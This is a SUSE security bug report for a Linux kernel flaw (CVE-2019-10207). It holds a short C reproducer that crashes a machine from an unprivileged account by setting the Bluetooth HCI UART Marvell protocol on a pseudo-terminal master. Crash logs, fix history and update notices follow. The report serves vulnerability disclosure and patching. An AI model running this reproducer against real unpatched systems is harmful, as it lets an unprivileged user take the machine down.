Bug 1123959 - VUL-0: kernel: HCI_UART_MRVL crashes the machine when used on PTY master
VUL-0: kernel: HCI_UART_MRVL crashes the machine when used on PTY master
Status: RESOLVED DUPLICATE of bug 1142857
Classification: Novell Products
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
unspecified
Other Other
: P3 - Medium : Normal
: ---
Assigned To: Al Cho
Security Team bot
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2019-02-01 07:28 UTC by Jiri Slaby
Modified: 2019-12-26 16:51 UTC (History)
2 users (show)

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
candidate fix (1.29 KB, patch)
2019-02-01 07:44 UTC, Jiri Slaby
Details | Diff

Note You need to log in before you can comment on or make changes to this bug.
Description Jiri Slaby 2019-02-01 07:28:09 UTC
This simple reproducer kills the machine even with only user privileges:

#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#include <linux/tty.h>

#define HCIUARTSETPROTO         _IOW('U', 200, int)
#define HCI_UART_MRVL   11

int main(void)
{
  int fd;
  int ld = N_HCI;
  fd = open("/dev/ptmx", O_RDWR);
  ioctl(fd, TIOCSETD, &ld);
  ioctl(fd, HCIUARTSETPROTO, HCI_UART_MRVL);

  grantpt(fd);
  unlockpt(fd);
  ioctl(fd, TIOCSETD, &ld);
  ioctl(fd, HCIUARTSETPROTO, HCI_UART_MRVL);

  return 0;
}

Tested on Tumbleweed and SLE12-SP1. On both, it leads to WARNINGs and a BUG:

> WARNING: CPU: 3 PID: 56 at drivers/tty/tty_ioctl.c:320 tty_set_termios+0x231/0x240
> Modules linked in: hci_uart btqca serdev btrtl btintel bluetooth ecdh_generic rfkill af_packet iscsi_ibft iscsi_boot_sysfs nls_iso8859_1 nls_cp437 vfat fat snd_hda_codec_generic snd_hda_intel snd_hda_codec ppdev snd_hda_core virtio_gpu snd_hwdep ttm snd_pcm drm_kms_helper drm snd_timer fb_sys_fops syscopyarea sysfillrect pcspkr snd sysimgblt joydev virtio_input parport_pc virtio_net parport net_failover qemu_fw_cfg failover virtio_balloon i2c_piix4 button soundcore ata_generic ata_piix ehci_pci uhci_hcd ehci_hcd serio_raw virtio_scsi usbcore floppy sg dm_multipath dm_mod scsi_dh_rdac scsi_dh_emc scsi_dh_alua virtio_rng
> CPU: 3 PID: 56 Comm: kworker/u9:0 Kdump: loaded Not tainted 4.20.6-16.g463cfd2-default #1 openSUSE Tumbleweed (unreleased)
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-0-ga698c89-prebuilt.qemu.org 04/01/2014
> Workqueue: hci0 hci_power_on [bluetooth]
> RIP: 0010:tty_set_termios+0x231/0x240
> Code: 00 e9 3f ff ff ff 25 80 0c 00 00 81 e6 7f f3 ff ff 09 f0 89 83 b0 03 00 00 48 8b 44 24 28 48 89 83 cc 03 00 00 e9 7c ff ff ff <0f> 0b e9 fc fd ff ff e8 83 81 a7 ff 0f 1f 00 0f 1f 44 00 00 41 54
> RSP: 0018:ffffaded00b27d40 EFLAGS: 00010246
> RAX: ffff91ecf76ae0c0 RBX: ffff91ed814ab000 RCX: 00000000003d0900
> RDX: 000000000000001e RSI: ffffaded00b27d9c RDI: ffff91ed814ab000
> RBP: ffff91ece39c5600 R08: 000000000001cb00 R09: 000000000001cb00
> R10: 000000000001c200 R11: 000000000001b900 R12: ffffaded00b27d9c
> R13: 0000000000000000 R14: ffff91ecf76d6780 R15: 0ffff91ed8047710
> FS:  0000000000000000(0000) GS:ffff91ed83780000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: 00005582b187e588 CR3: 0000000036ef0000 CR4: 00000000000006e0
> DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
> DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
> Call Trace:
>  ? __mutex_lock+0x233/0x8e0
>  ? print_shortest_lock_dependencies+0x40/0x40
>  hci_uart_set_baudrate+0x88/0xe0 [hci_uart]
>  hci_uart_setup+0x29/0x140 [hci_uart]
>  hci_dev_do_open+0xd0/0x5c0 [bluetooth]
>  ? process_one_work+0x21a/0x620
>  ? __lock_is_held+0x4f/0x90
>  hci_power_on+0x3e/0x210 [bluetooth]
>  process_one_work+0x29a/0x620
>  worker_thread+0x2d/0x3d0
>  ? rescuer_thread+0x340/0x340
>  kthread+0x116/0x130
>  ? kthread_create_worker_on_cpu+0x40/0x40
>  ret_from_fork+0x3a/0x50
> irq event stamp: 66
> hardirqs last  enabled at (65): [<ffffffffb39513a9>] _raw_spin_unlock_irq+0x29/0x50
> hardirqs last disabled at (66): [<ffffffffb30036a0>] trace_hardirqs_off_thunk+0x1a/0x1c
> softirqs last  enabled at (0): [<ffffffffb30955b9>] copy_process.part.39+0x9f9/0x2280
> softirqs last disabled at (0): [<0000000000000000>]           (null)
> ---[ end trace fbec9ae0473fb7c6 ]---
> WARNING: CPU: 3 PID: 56 at drivers/tty/tty_ioctl.c:320 tty_set_termios+0x231/0x240
> Modules linked in: hci_uart btqca serdev btrtl btintel bluetooth ecdh_generic rfkill af_packet iscsi_ibft iscsi_boot_sysfs nls_iso8859_1 nls_cp437 vfat fat snd_hda_codec_generic snd_hda_intel snd_hda_codec ppdev snd_hda_core virtio_gpu snd_hwdep ttm snd_pcm drm_kms_helper drm snd_timer fb_sys_fops syscopyarea sysfillrect pcspkr snd sysimgblt joydev virtio_input parport_pc virtio_net parport net_failover qemu_fw_cfg failover virtio_balloon i2c_piix4 button soundcore ata_generic ata_piix ehci_pci uhci_hcd ehci_hcd serio_raw virtio_scsi usbcore floppy sg dm_multipath dm_mod scsi_dh_rdac scsi_dh_emc scsi_dh_alua virtio_rng
> CPU: 3 PID: 56 Comm: kworker/u9:0 Kdump: loaded Tainted: G        W         4.20.6-16.g463cfd2-default #1 openSUSE Tumbleweed (unreleased)
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-0-ga698c89-prebuilt.qemu.org 04/01/2014
> Workqueue: hci0 hci_power_on [bluetooth]
> RIP: 0010:tty_set_termios+0x231/0x240
> Code: 00 e9 3f ff ff ff 25 80 0c 00 00 81 e6 7f f3 ff ff 09 f0 89 83 b0 03 00 00 48 8b 44 24 28 48 89 83 cc 03 00 00 e9 7c ff ff ff <0f> 0b e9 fc fd ff ff e8 83 81 a7 ff 0f 1f 00 0f 1f 44 00 00 41 54
> RSP: 0018:ffffaded00b27d50 EFLAGS: 00010246
> RAX: ffff91ecf76ae0c0 RBX: ffff91ed814ab000 RCX: ffffaded00b27cfc
> RDX: ffffffff00000001 RSI: ffffaded00b27dac RDI: ffff91ed814ab000
> RBP: ffff91ece39c5600 R08: 0000000000000000 R09: 0000000000000005
> R10: 0000000000000000 R11: ffff91ed814ab090 R12: ffffaded00b27dac
> R13: 0000000000000000 R14: ffff91ecf76d6780 R15: 0ffff91ed8047710
> FS:  0000000000000000(0000) GS:ffff91ed83780000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: 00005582b187e588 CR3: 0000000036ef0000 CR4: 00000000000006e0
> DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
> DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
> Call Trace:
>  hci_uart_set_flow_control+0x17f/0x2d0 [hci_uart]
>  mrvl_setup+0x13/0x70 [hci_uart]
>  hci_dev_do_open+0xd0/0x5c0 [bluetooth]
>  ? process_one_work+0x21a/0x620
>  ? __lock_is_held+0x4f/0x90
>  hci_power_on+0x3e/0x210 [bluetooth]
>  process_one_work+0x29a/0x620
>  worker_thread+0x2d/0x3d0
>  ? rescuer_thread+0x340/0x340
>  kthread+0x116/0x130
>  ? kthread_create_worker_on_cpu+0x40/0x40
>  ret_from_fork+0x3a/0x50
> irq event stamp: 68
> hardirqs last  enabled at (67): [<ffffffffb3003684>] trace_hardirqs_on_thunk+0x1a/0x1c
> hardirqs last disabled at (68): [<ffffffffb30036a0>] trace_hardirqs_off_thunk+0x1a/0x1c
> softirqs last  enabled at (0): [<ffffffffb30955b9>] copy_process.part.39+0x9f9/0x2280
> softirqs last disabled at (0): [<0000000000000000>]           (null)
> ---[ end trace fbec9ae0473fb7c7 ]---
> BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
> PGD 0 P4D 0
> Oops: 0010 [#1] PREEMPT SMP PTI
> CPU: 3 PID: 56 Comm: kworker/u9:0 Kdump: loaded Tainted: G        W         4.20.6-16.g463cfd2-default #1 openSUSE Tumbleweed (unreleased)
> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-0-ga698c89-prebuilt.qemu.org 04/01/2014
> Workqueue: hci0 hci_power_on [bluetooth]
> RIP: 0010:          (null)
> Code: Bad RIP value.
> RSP: 0018:ffffaded00b27da0 EFLAGS: 00010286
> RAX: 0000000000000000 RBX: ffff91ed814ab000 RCX: ffffaded00b27d0c
> RDX: ffffffff00000001 RSI: 0000000000000000 RDI: ffff91ed814ab000
> RBP: ffff91ece39c5600 R08: 0000000000000000 R09: 0000000000000005
> R10: 0000000000000000 R11: ffff91ed814ab090 R12: ffff91ed819dadd0
> R13: 0000000000000000 R14: ffff91ecf76d6780 R15: 0ffff91ed8047710
> FS:  0000000000000000(0000) GS:ffff91ed83780000(0000) knlGS:0000000000000000
> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> CR2: ffffffffffffffd6 CR3: 0000000022210000 CR4: 00000000000006e0
> DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
> DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
> Call Trace:
>  ? hci_uart_set_flow_control+0x19e/0x2d0 [hci_uart]
>  ? mrvl_setup+0x13/0x70 [hci_uart]
>  ? hci_dev_do_open+0xd0/0x5c0 [bluetooth]
>  ? process_one_work+0x21a/0x620
>  ? __lock_is_held+0x4f/0x90
>  ? hci_power_on+0x3e/0x210 [bluetooth]
>  ? process_one_work+0x29a/0x620
>  ? worker_thread+0x2d/0x3d0
>  ? rescuer_thread+0x340/0x340
>  ? kthread+0x116/0x130
>  ? kthread_create_worker_on_cpu+0x40/0x40
>  ? ret_from_fork+0x3a/0x50
> Modules linked in: hci_uart btqca serdev btrtl btintel bluetooth ecdh_generic rfkill af_packet iscsi_ibft iscsi_boot_sysfs nls_iso8859_1 nls_cp437 vfat fat snd_hda_codec_generic snd_hda_intel snd_hda_codec ppdev snd_hda_core virtio_gpu snd_hwdep ttm snd_pcm drm_kms_helper drm snd_timer fb_sys_fops syscopyarea sysfillrect pcspkr snd sysimgblt joydev virtio_input parport_pc virtio_net parport net_failover qemu_fw_cfg failover virtio_balloon i2c_piix4 button soundcore ata_generic ata_piix ehci_pci uhci_hcd ehci_hcd serio_raw virtio_scsi usbcore floppy sg dm_multipath dm_mod scsi_dh_rdac scsi_dh_emc scsi_dh_alua virtio_rng
> CR2: 0000000000000000
Comment 1 Jiri Slaby 2019-02-01 07:44:55 UTC
Created attachment 795775 [details]
candidate fix

Waiting for upstream to come up with something.
Comment 2 Jiri Slaby 2019-02-01 08:00:36 UTC
The warnings started likely with 7721383f4199 (4.2). The BUG with Marvell support  in 162f812f23b (4.9).
Comment 3 Marcus Meissner 2019-02-12 13:56:18 UTC
any news here?

moving to security
Comment 4 Jiri Slaby 2019-07-15 09:47:45 UTC
(In reply to Marcus Meissner from comment #3)
> any news here?

It's still a deep hole in the kernel, tested with 5.2.1 right now. Can you push this somehow? This went to security of kernel, the maintainer is aware of this, but nobody fixed this yet.
Comment 5 Jiri Slaby 2019-07-26 08:00:06 UTC
This is CVE-2019-10207 handled in bug 1142857 now.
Comment 6 Marcus Meissner 2019-07-26 08:29:30 UTC
thanks for the persistence(I guess it was you pushing that moved it forward :)

*** This bug has been marked as a duplicate of bug 1142857 ***
Comment 8 Swamp Workflow Management 2019-08-07 09:52:02 UTC
This is an autogenerated message for OBS integration:
This bug (1123959) was mentioned in
https://build.opensuse.org/request/show/721464 15.1 / kernel-source
Comment 9 Swamp Workflow Management 2019-08-07 10:51:17 UTC
This is an autogenerated message for OBS integration:
This bug (1123959) was mentioned in
https://build.opensuse.org/request/show/721484 15.0 / kernel-source
Comment 10 Swamp Workflow Management 2019-08-16 16:13:28 UTC
openSUSE-SU-2019:1924-1: An update that solves 8 vulnerabilities and has 90 fixes is now available.

Category: security (important)
Bug References: 1051510,1055117,1071995,1083647,1083710,1085030,1086103,1102247,1106061,1111666,1114279,1119222,1123959,1127034,1127315,1129770,1130972,1131281,1133021,1134097,1134390,1134399,1135335,1135642,1135897,1137458,1137534,1137535,1137584,1137609,1137811,1137827,1139101,1139358,1139500,1140133,1140139,1140322,1140426,1140652,1140887,1140888,1140889,1140891,1140893,1140903,1140945,1140948,1140954,1140955,1140956,1140957,1140958,1140959,1140960,1140961,1140962,1140964,1140971,1140972,1140992,1141401,1141402,1141450,1141452,1141453,1141454,1141478,1142023,1142112,1142117,1142118,1142119,1142220,1142221,1142254,1142265,1142350,1142351,1142354,1142359,1142450,1142496,1142635,1142685,1142701,1142857,1142868,1143003,1143045,1143105,1143185,1143189,1143191,1143466,1143507,1144474,1144518
CVE References: CVE-2018-20855,CVE-2019-10207,CVE-2019-1125,CVE-2019-11810,CVE-2019-13631,CVE-2019-13648,CVE-2019-14283,CVE-2019-14284
Sources used:
openSUSE Leap 15.0 (src):    kernel-debug-4.12.14-lp150.12.70.1, kernel-default-4.12.14-lp150.12.70.1, kernel-docs-4.12.14-lp150.12.70.1, kernel-kvmsmall-4.12.14-lp150.12.70.1, kernel-obs-build-4.12.14-lp150.12.70.1, kernel-obs-qa-4.12.14-lp150.12.70.1, kernel-source-4.12.14-lp150.12.70.1, kernel-syms-4.12.14-lp150.12.70.1, kernel-vanilla-4.12.14-lp150.12.70.1
Comment 11 Swamp Workflow Management 2019-08-16 16:27:27 UTC
openSUSE-SU-2019:1923-1: An update that solves 8 vulnerabilities and has 97 fixes is now available.

Category: security (important)
Bug References: 1051510,1055117,1071995,1083647,1083710,1085030,1086103,1102247,1103991,1103992,1104745,1106061,1109837,1111666,1112374,1114279,1119222,1123959,1127034,1127315,1127611,1129770,1130972,1131281,1133021,1134090,1134097,1134390,1134399,1135335,1135642,1135897,1136217,1136342,1136352,1136460,1136461,1136467,1136502,1137458,1137534,1137535,1137584,1137609,1137811,1137827,1138874,1139101,1139358,1139500,1139619,1140133,1140139,1140322,1140426,1140559,1140652,1140676,1140903,1140945,1141312,1141401,1141402,1141450,1141452,1141453,1141454,1141478,1141558,1142023,1142052,1142083,1142112,1142115,1142117,1142118,1142119,1142220,1142221,1142254,1142265,1142350,1142351,1142354,1142359,1142450,1142623,1142635,1142673,1142685,1142701,1142857,1142868,1143003,1143045,1143105,1143185,1143189,1143191,1143209,1143466,1143507,1143738,1144474,1144518
CVE References: CVE-2018-20855,CVE-2019-10207,CVE-2019-1125,CVE-2019-11810,CVE-2019-13631,CVE-2019-13648,CVE-2019-14283,CVE-2019-14284
Sources used:
openSUSE Leap 15.1 (src):    kernel-debug-4.12.14-lp151.28.13.1, kernel-default-4.12.14-lp151.28.13.1, kernel-docs-4.12.14-lp151.28.13.1, kernel-kvmsmall-4.12.14-lp151.28.13.1, kernel-obs-build-4.12.14-lp151.28.13.1, kernel-obs-qa-4.12.14-lp151.28.13.1, kernel-source-4.12.14-lp151.28.13.1, kernel-syms-4.12.14-lp151.28.13.1, kernel-vanilla-4.12.14-lp151.28.13.1
Comment 19 Swamp Workflow Management 2019-09-20 13:18:19 UTC
SUSE-SU-2019:2414-1: An update that solves 39 vulnerabilities and has 180 fixes is now available.

Category: security (important)
Bug References: 1047238,1050911,1051510,1054914,1055117,1056686,1060662,1061840,1061843,1064597,1064701,1065600,1065729,1066369,1071009,1071306,1078248,1082555,1085030,1085536,1085539,1086103,1087092,1090734,1091171,1093205,1102097,1104902,1106061,1106284,1106434,1108382,1112894,1112899,1112902,1112903,1112905,1112906,1112907,1113722,1114279,1114542,1118689,1119086,1120876,1120902,1120937,1123105,1123959,1124370,1129424,1129519,1129664,1131107,1131281,1131565,1133021,1134291,1134881,1134882,1135219,1135642,1135897,1136261,1137811,1137884,1138539,1139020,1139021,1139101,1139500,1140012,1140426,1140487,1141450,1141543,1141554,1142019,1142076,1142109,1142117,1142118,1142119,1142496,1142541,1142635,1142685,1142701,1142857,1143300,1143466,1143765,1143841,1143843,1144123,1144333,1144474,1144518,1144718,1144813,1144880,1144886,1144912,1144920,1144979,1145010,1145051,1145059,1145189,1145235,1145300,1145302,1145388,1145389,1145390,1145391,1145392,1145393,1145394,1145395,1145396,1145397,1145408,1145409,1145661,1145678,1145687,1145920,1145922,1145934,1145937,1145940,1145941,1145942,1146074,1146084,1146163,1146285,1146346,1146351,1146352,1146361,1146376,1146378,1146381,1146391,1146399,1146413,1146425,1146512,1146514,1146516,1146519,1146524,1146526,1146529,1146531,1146543,1146547,1146550,1146575,1146589,1146678,1146938,1148031,1148032,1148033,1148034,1148035,1148093,1148133,1148192,1148196,1148198,1148202,1148303,1148363,1148379,1148394,1148527,1148574,1148616,1148617,1148619,1148859,1148868,1149053,1149083,1149104,1149105,1149106,1149197,1149214,1149224,1149325,1149376,1149413,1149418,1149424,1149522,1149527,1149539,1149552,1149591,1149602,1149612,1149626,1149652,1149713,1149940,1149976,1150025,1150033,1150112,1150562,1150727,1150860,1150861,1150933
CVE References: CVE-2017-18551,CVE-2018-20976,CVE-2018-21008,CVE-2019-10207,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14835,CVE-2019-15030,CVE-2019-15031,CVE-2019-15090,CVE-2019-15098,CVE-2019-15117,CVE-2019-15118,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15222,CVE-2019-15239,CVE-2019-15290,CVE-2019-15292,CVE-2019-15538,CVE-2019-15666,CVE-2019-15902,CVE-2019-15917,CVE-2019-15919,CVE-2019-15920,CVE-2019-15921,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-9456
Sources used:
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-default-4.12.14-150.35.1, kernel-livepatch-SLE15_Update_14-1-1.3.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 20 Swamp Workflow Management 2019-09-20 13:44:31 UTC
SUSE-SU-2019:2412-1: An update that solves 40 vulnerabilities and has 184 fixes is now available.

Category: security (important)
Bug References: 1047238,1050911,1051510,1054914,1055117,1056686,1060662,1061840,1061843,1064597,1064701,1065600,1065729,1066369,1071009,1071306,1078248,1082555,1085030,1085536,1085539,1086103,1087092,1090734,1091171,1093205,1102097,1104902,1106061,1106284,1106434,1108382,1112178,1112894,1112899,1112902,1112903,1112905,1112906,1112907,1113722,1114279,1114542,1118689,1119086,1120876,1120902,1120937,1123105,1123959,1124370,1129424,1129519,1129664,1131107,1131281,1131565,1133021,1134291,1134881,1134882,1135219,1135642,1135897,1136261,1137069,1137884,1138539,1139020,1139021,1139101,1139500,1140012,1140426,1140487,1141013,1141450,1141543,1141554,1142019,1142076,1142109,1142117,1142118,1142119,1142496,1142541,1142635,1142685,1142701,1142857,1143300,1143466,1143765,1143841,1143843,1144123,1144333,1144474,1144518,1144718,1144813,1144880,1144886,1144912,1144920,1144979,1145010,1145024,1145051,1145059,1145189,1145235,1145300,1145302,1145388,1145389,1145390,1145391,1145392,1145393,1145394,1145395,1145396,1145397,1145408,1145409,1145661,1145678,1145687,1145920,1145922,1145934,1145937,1145940,1145941,1145942,1146074,1146084,1146163,1146285,1146346,1146351,1146352,1146361,1146368,1146376,1146378,1146381,1146391,1146399,1146413,1146425,1146516,1146519,1146524,1146526,1146529,1146531,1146543,1146547,1146550,1146575,1146589,1146678,1146938,1148031,1148032,1148033,1148034,1148035,1148093,1148133,1148192,1148196,1148198,1148202,1148303,1148363,1148379,1148394,1148527,1148574,1148616,1148617,1148619,1148698,1148859,1148868,1149053,1149083,1149104,1149105,1149106,1149197,1149214,1149224,1149325,1149376,1149413,1149418,1149424,1149522,1149527,1149539,1149552,1149591,1149602,1149612,1149626,1149652,1149713,1149940,1149959,1149963,1149976,1150025,1150033,1150112,1150562,1150727,1150860,1150861,1150933
CVE References: CVE-2017-18551,CVE-2018-20976,CVE-2018-21008,CVE-2019-10207,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14835,CVE-2019-15030,CVE-2019-15031,CVE-2019-15090,CVE-2019-15098,CVE-2019-15099,CVE-2019-15117,CVE-2019-15118,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15222,CVE-2019-15239,CVE-2019-15290,CVE-2019-15292,CVE-2019-15538,CVE-2019-15666,CVE-2019-15902,CVE-2019-15917,CVE-2019-15919,CVE-2019-15920,CVE-2019-15921,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-9456
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP4 (src):    kernel-default-4.12.14-95.32.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    kernel-docs-4.12.14-95.32.1, kernel-obs-build-4.12.14-95.32.1
SUSE Linux Enterprise Server 12-SP4 (src):    kernel-default-4.12.14-95.32.1, kernel-source-4.12.14-95.32.1, kernel-syms-4.12.14-95.32.1
SUSE Linux Enterprise High Availability 12-SP4 (src):    kernel-default-4.12.14-95.32.1
SUSE Linux Enterprise Desktop 12-SP4 (src):    kernel-default-4.12.14-95.32.1, kernel-source-4.12.14-95.32.1, kernel-syms-4.12.14-95.32.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 21 Swamp Workflow Management 2019-09-20 14:12:03 UTC
SUSE-SU-2019:2412-1: An update that solves 40 vulnerabilities and has 184 fixes is now available.

Category: security (important)
Bug References: 1047238,1050911,1051510,1054914,1055117,1056686,1060662,1061840,1061843,1064597,1064701,1065600,1065729,1066369,1071009,1071306,1078248,1082555,1085030,1085536,1085539,1086103,1087092,1090734,1091171,1093205,1102097,1104902,1106061,1106284,1106434,1108382,1112178,1112894,1112899,1112902,1112903,1112905,1112906,1112907,1113722,1114279,1114542,1118689,1119086,1120876,1120902,1120937,1123105,1123959,1124370,1129424,1129519,1129664,1131107,1131281,1131565,1133021,1134291,1134881,1134882,1135219,1135642,1135897,1136261,1137069,1137884,1138539,1139020,1139021,1139101,1139500,1140012,1140426,1140487,1141013,1141450,1141543,1141554,1142019,1142076,1142109,1142117,1142118,1142119,1142496,1142541,1142635,1142685,1142701,1142857,1143300,1143466,1143765,1143841,1143843,1144123,1144333,1144474,1144518,1144718,1144813,1144880,1144886,1144912,1144920,1144979,1145010,1145024,1145051,1145059,1145189,1145235,1145300,1145302,1145388,1145389,1145390,1145391,1145392,1145393,1145394,1145395,1145396,1145397,1145408,1145409,1145661,1145678,1145687,1145920,1145922,1145934,1145937,1145940,1145941,1145942,1146074,1146084,1146163,1146285,1146346,1146351,1146352,1146361,1146368,1146376,1146378,1146381,1146391,1146399,1146413,1146425,1146516,1146519,1146524,1146526,1146529,1146531,1146543,1146547,1146550,1146575,1146589,1146678,1146938,1148031,1148032,1148033,1148034,1148035,1148093,1148133,1148192,1148196,1148198,1148202,1148303,1148363,1148379,1148394,1148527,1148574,1148616,1148617,1148619,1148698,1148859,1148868,1149053,1149083,1149104,1149105,1149106,1149197,1149214,1149224,1149325,1149376,1149413,1149418,1149424,1149522,1149527,1149539,1149552,1149591,1149602,1149612,1149626,1149652,1149713,1149940,1149959,1149963,1149976,1150025,1150033,1150112,1150562,1150727,1150860,1150861,1150933
CVE References: CVE-2017-18551,CVE-2018-20976,CVE-2018-21008,CVE-2019-10207,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14835,CVE-2019-15030,CVE-2019-15031,CVE-2019-15090,CVE-2019-15098,CVE-2019-15099,CVE-2019-15117,CVE-2019-15118,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15222,CVE-2019-15239,CVE-2019-15290,CVE-2019-15292,CVE-2019-15538,CVE-2019-15666,CVE-2019-15902,CVE-2019-15917,CVE-2019-15919,CVE-2019-15920,CVE-2019-15921,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-9456
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP4 (src):    kernel-default-4.12.14-95.32.1
SUSE Linux Enterprise Software Development Kit 12-SP4 (src):    kernel-docs-4.12.14-95.32.1, kernel-obs-build-4.12.14-95.32.1
SUSE Linux Enterprise Server 12-SP4 (src):    kernel-default-4.12.14-95.32.1, kernel-source-4.12.14-95.32.1, kernel-syms-4.12.14-95.32.1
SUSE Linux Enterprise Live Patching 12-SP4 (src):    kgraft-patch-SLE12-SP4_Update_8-1-6.3.1
SUSE Linux Enterprise High Availability 12-SP4 (src):    kernel-default-4.12.14-95.32.1
SUSE Linux Enterprise Desktop 12-SP4 (src):    kernel-default-4.12.14-95.32.1, kernel-source-4.12.14-95.32.1, kernel-syms-4.12.14-95.32.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
Comment 22 Swamp Workflow Management 2019-09-20 14:50:47 UTC
SUSE-SU-2019:2414-1: An update that solves 39 vulnerabilities and has 180 fixes is now available.

Category: security (important)
Bug References: 1047238,1050911,1051510,1054914,1055117,1056686,1060662,1061840,1061843,1064597,1064701,1065600,1065729,1066369,1071009,1071306,1078248,1082555,1085030,1085536,1085539,1086103,1087092,1090734,1091171,1093205,1102097,1104902,1106061,1106284,1106434,1108382,1112894,1112899,1112902,1112903,1112905,1112906,1112907,1113722,1114279,1114542,1118689,1119086,1120876,1120902,1120937,1123105,1123959,1124370,1129424,1129519,1129664,1131107,1131281,1131565,1133021,1134291,1134881,1134882,1135219,1135642,1135897,1136261,1137811,1137884,1138539,1139020,1139021,1139101,1139500,1140012,1140426,1140487,1141450,1141543,1141554,1142019,1142076,1142109,1142117,1142118,1142119,1142496,1142541,1142635,1142685,1142701,1142857,1143300,1143466,1143765,1143841,1143843,1144123,1144333,1144474,1144518,1144718,1144813,1144880,1144886,1144912,1144920,1144979,1145010,1145051,1145059,1145189,1145235,1145300,1145302,1145388,1145389,1145390,1145391,1145392,1145393,1145394,1145395,1145396,1145397,1145408,1145409,1145661,1145678,1145687,1145920,1145922,1145934,1145937,1145940,1145941,1145942,1146074,1146084,1146163,1146285,1146346,1146351,1146352,1146361,1146376,1146378,1146381,1146391,1146399,1146413,1146425,1146512,1146514,1146516,1146519,1146524,1146526,1146529,1146531,1146543,1146547,1146550,1146575,1146589,1146678,1146938,1148031,1148032,1148033,1148034,1148035,1148093,1148133,1148192,1148196,1148198,1148202,1148303,1148363,1148379,1148394,1148527,1148574,1148616,1148617,1148619,1148859,1148868,1149053,1149083,1149104,1149105,1149106,1149197,1149214,1149224,1149325,1149376,1149413,1149418,1149424,1149522,1149527,1149539,1149552,1149591,1149602,1149612,1149626,1149652,1149713,1149940,1149976,1150025,1150033,1150112,1150562,1150727,1150860,1150861,1150933
CVE References: CVE-2017-18551,CVE-2018-20976,CVE-2018-21008,CVE-2019-10207,CVE-2019-14814,CVE-2019-14815,CVE-2019-14816,CVE-2019-14835,CVE-2019-15030,CVE-2019-15031,CVE-2019-15090,CVE-2019-15098,CVE-2019-15117,CVE-2019-15118,CVE-2019-15211,CVE-2019-15212,CVE-2019-15214,CVE-2019-15215,CVE-2019-15216,CVE-2019-15217,CVE-2019-15218,CVE-2019-15219,CVE-2019-15220,CVE-2019-15221,CVE-2019-15222,CVE-2019-15239,CVE-2019-15290,CVE-2019-15292,CVE-2019-15538,CVE-2019-15666,CVE-2019-15902,CVE-2019-15917,CVE-2019-15919,CVE-2019-15920,CVE-2019-15921,CVE-2019-15924,CVE-2019-15926,CVE-2019-15927,CVE-2019-9456
Sources used:
SUSE Linux Enterprise Workstation Extension 15 (src):    kernel-default-4.12.14-150.35.1
SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (src):    kernel-default-4.12.14-150.35.1, kernel-docs-4.12.14-150.35.1, kernel-obs-qa-4.12.14-150.35.1
SUSE Linux Enterprise Module for Live Patching 15 (src):    kernel-default-4.12.14-150.35.1, kernel-livepatch-SLE15_Update_14-1-1.3.1
SUSE Linux Enterprise Module for Legacy Software 15 (src):    kernel-default-4.12.14-150.35.1
SUSE Linux Enterprise Module for Development Tools 15 (src):    kernel-docs-4.12.14-150.35.1, kernel-obs-build-4.12.14-150.35.1, kernel-source-4.12.14-150.35.1, kernel-syms-4.12.14-150.35.1, kernel-vanilla-4.12.14-150.35.1
SUSE Linux Enterprise Module for Basesystem 15 (src):    kernel-default-4.12.14-150.35.1, kernel-source-4.12.14-150.35.1, kernel-zfcpdump-4.12.14-150.35.1
SUSE Linux Enterprise High Availability 15 (src):    kernel-default-4.12.14-150.35.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
